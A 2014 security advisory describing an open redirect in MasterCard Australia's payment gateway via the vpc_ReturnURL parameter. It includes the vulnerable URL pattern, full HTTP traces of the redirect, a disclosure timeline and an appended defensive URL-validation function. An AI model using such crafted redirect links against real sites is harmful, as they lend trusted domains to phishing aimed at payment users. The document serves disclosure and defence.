
MasterCard Open Redirect

Posted Jul 28, 2014
Authored by Anastasios Monachos

MasterCard.com.au suffers from an open redirect vulnerability.

tags | exploit
SHA-256 | 17091aa154924d37cfd73e3daf265786342f19af4f9ee46ad81527ff34d612aa

=======================================================================
MasterCard - Open Redirect
=======================================================================

Affected Domain : mastercard.com.au
Local/Remote : Remote
Severity : Very Low
Vulnerable URL : https://migs.mastercard.com.au/vpcpay?vpc_ReturnURL=http://<any_domain>
Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]

[Summary]

The vpc_ReturnURL parameter is not properly verified before being used as a redirect target. This can be exploited to redirect a user to an arbitrary website, e.g. when a user clicks a specially crafted link to the affected script hosted on a trusted domain.

[Vulnerability Details]

GET Request:
------------
GET https://migs.mastercard.com.au/vpcpay?vpc_ReturnURL=http://www.google.com HTTP/1.1
Host: migs.mastercard.com.au
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

GET Response:
-------------
HTTP/1.1 302 Found
Date: Mon, 23 May 2014 12:26:51 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa TA1a OUR BUS IND UNI COM NAV INT"
Set-Cookie: PAY4939831625825013779=PAY8CA6985107791A1B572838CBB73CF5D3; Path=/; Secure
Expires: Sun, 15 Jun 1990 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: PS_ENCODING_COOKIE=iso-8859-1; Expires=Mon, 23-Jun-2014 12:56:51 GMT; Secure
Accept-Charset: iso-8859-1, unicode-1-1;q=0.8
Pragma: no-cache
Location: https://migs.mastercard.com.au/vpcpay?o=pt&DOID=AA93D612C3210464C0F03BF66D5DCDCE&paymentId=4999831621825113478
Content-Language: en
Content-Length: 0
Keep-Alive: timeout=15, max=79
Connection: Keep-Alive
Content-Type: text/html;charset=iso-8859-1

Follow up GET Request I:
------------------------
GET https://migs.mastercard.com.au/vpcpay?o=pt&DOID=AA93D612C3210464C0F03BF66D5DCDCE&paymentId=4999831621825113478 HTTP/1.1
Host: migs.mastercard.com.au
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

GET follow up Response I:
-------------------------
HTTP/1.1 302 Found
Date: Mon, 23 May 2014 12:27:10 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa TA1a OUR BUS IND UNI COM NAV INT"
Expires: Sun, 15 Jun 1990 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: PS_ENCODING_COOKIE=iso-8859-1; Expires=Mon, 23-Jun-2014 12:57:10 GMT; Secure
Accept-Charset: iso-8859-1, unicode-1-1;q=0.8
Pragma: no-cache
Location: http://www.google.com?vpc_Amount=0&vpc_BatchNo=0&vpc_Locale=en&vpc_Message=Required+field+vpc_Merchant+was+not+present+in+the+request&vpc_TransactionNo=0&vpc_TxnResponseCode=7
Content-Language: en
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=iso-8859-1

GET follow up Request II:
-------------------------
GET http://www.google.com/?vpc_Amount=0&vpc_BatchNo=0&vpc_Locale=en&vpc_Message=Required+field+vpc_Merchant+was+not+present+in+the+request&vpc_TransactionNo=0&vpc_TxnResponseCode=7 HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

GET follow up Response II:
--------------------------
HTTP/1.1 302 Found
Location: http://www.google.com/?gws_rd=cr&ei=QR2oU9PfGYf-ygO6yIC4Dg
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 23 May 2014 12:27:41 GMT
Server: gws
Content-Length: 258
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.com/?gws_rd=cr&ei=QR2oU9PfGYf-ygO6yIC4Dg">here</A>.
</BODY></HTML>


[Time-line]

23/06/2014 - Advisory created
23/06/2014 - Mastercard notified: no response
25/06/2014 - Vendor contacted again - different department: no response
08/07/2014 - Re-contacted both departments: no response
27/07/2014 - Advisory published
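
In the trace above, the gateway redirects to vpc_ReturnURL even though vpc_Merchant is missing. A server-side check that closes this path is sketched below as an added example; it is not code from the advisory or from the vendor. The merchant registry, the merchant id, the hosts and the function name are constructed for illustration.

```python
from urllib.parse import urlsplit

# Constructed registry (assumption): merchant id -> exact origins that the
# merchant registered for return URLs. Ids and hosts are hypothetical.
MERCHANT_RETURN_ORIGINS = {
    "TESTMERCHANT01": {("https", "shop.example.com", 443)},
}


def safe_return_url(params):
    """Return vpc_ReturnURL if it may be used as a redirect target, else None.

    None means: render the error or receipt page on the gateway itself
    instead of issuing a 302 to a caller-supplied location.
    """
    target = params.get("vpc_ReturnURL", "")
    allowed = MERCHANT_RETURN_ORIGINS.get(params.get("vpc_Merchant"))
    # The advisory's request carried no vpc_Merchant and was still redirected.
    # Without an identified merchant there is nothing to validate against.
    if not allowed or not target:
        return None
    # Backslashes, whitespace and control characters are normalised
    # differently by browsers and by URL parsers, so refuse them outright.
    if any(c == "\\" or c.isspace() or ord(c) < 0x20 for c in target):
        return None
    try:
        parts = urlsplit(target)
        port = parts.port or {"https": 443, "http": 80}.get(parts.scheme)
    except ValueError:  # malformed port or bracketed host
        return None
    # Userinfo hides the real host: https://shop.example.com@other.test/
    if parts.username is not None or parts.password is not None:
        return None
    host = (parts.hostname or "").lower()
    # Exact origin match: no prefix, suffix or substring comparison.
    if (parts.scheme, host, port) not in allowed:
        return None
    return target
```
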